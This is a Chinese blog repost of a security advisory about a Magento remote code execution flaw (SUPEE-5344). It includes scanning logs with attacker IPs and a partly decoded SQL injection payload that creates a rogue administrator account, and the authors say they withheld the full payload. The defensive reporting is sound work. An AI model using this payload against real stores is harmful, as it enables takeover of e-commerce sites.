2018年04月6日网站服务器迁移完成……

电子商务系统Magento远程代码漏洞EXP流出,黑客已开始大规模扫描

php 苏 demo 1576℃ 0评论

上周FreeBuf报道了 电子商务系统Magento远程代码执行漏洞(SUPEE-5344) 的消息,现在CheckPoint安全团队放出了漏洞利用(EXP)的部分细节。

漏洞利用视频

这个视频可以证明漏洞的有效性,视频里面安全研究者利用一个Magento网站越权给自己加了一张优惠券:

当然,这是一个简单的例子,该漏洞可以有更多的玩法。

日志中发现大量攻击请求

如大家所预料的是,国外黑客已经利用这个漏洞EXP在遍地撒网了。在漏洞披露后,我们通过WAF日志看到了不少对这个漏洞进行扫描的日志:

62.76.177.179 – – [23/Apr/2015:00:45:44 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1403 1880 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36185.22.232.218 – – [22/Apr/2015:00:42:38 -0400] “POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1200 2211 “-” “Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0

日志里所有的攻击来自两个IP:62.76.177.179和185.22.232.218,如果你在日志里发现这两个IP的话,估计你不幸地遭受过这个犯罪组织的扫描攻击。

攻击分析

我们的研究小组捕获并分析了他们EXP,从现有的信息来看,他们只是试图在Magento数据库里创建一个admin用户,很明显他们还会进行后续工作来接管被黑的网站,被解密的exp部分信息如下:

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);
SET @SALT = “rp”;
SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’);

以上代码利用的是SQL注入,往网站数据库里插入了新的admin_user。如果你怀疑自己被黑了,你可以查查你的数据库里有没有多出defaultmanager或者vpwq两个用户名,这两个用户名是该犯罪团伙所具备的攻击特征之一。

在这里给大家说声抱歉,我们隐藏了部分细节和完整的攻击负载(Payload),因为这样能避免部分小白黑客直接复制代码,轻易地拿去批量黑站。但是高水平的黑客组织应该已经开发出漏洞利用程序,而且已经开始没日没夜地扫描和入侵。

打赏

转载请注明:苏demo的别样人生 » 电子商务系统Magento远程代码漏洞EXP流出,黑客已开始大规模扫描

   如果本篇文章对您有帮助,欢迎向博主进行赞助,赞助时请写上您的用户名。
支付宝直接捐助帐号oracle_lee@qq.com 感谢支持!
喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情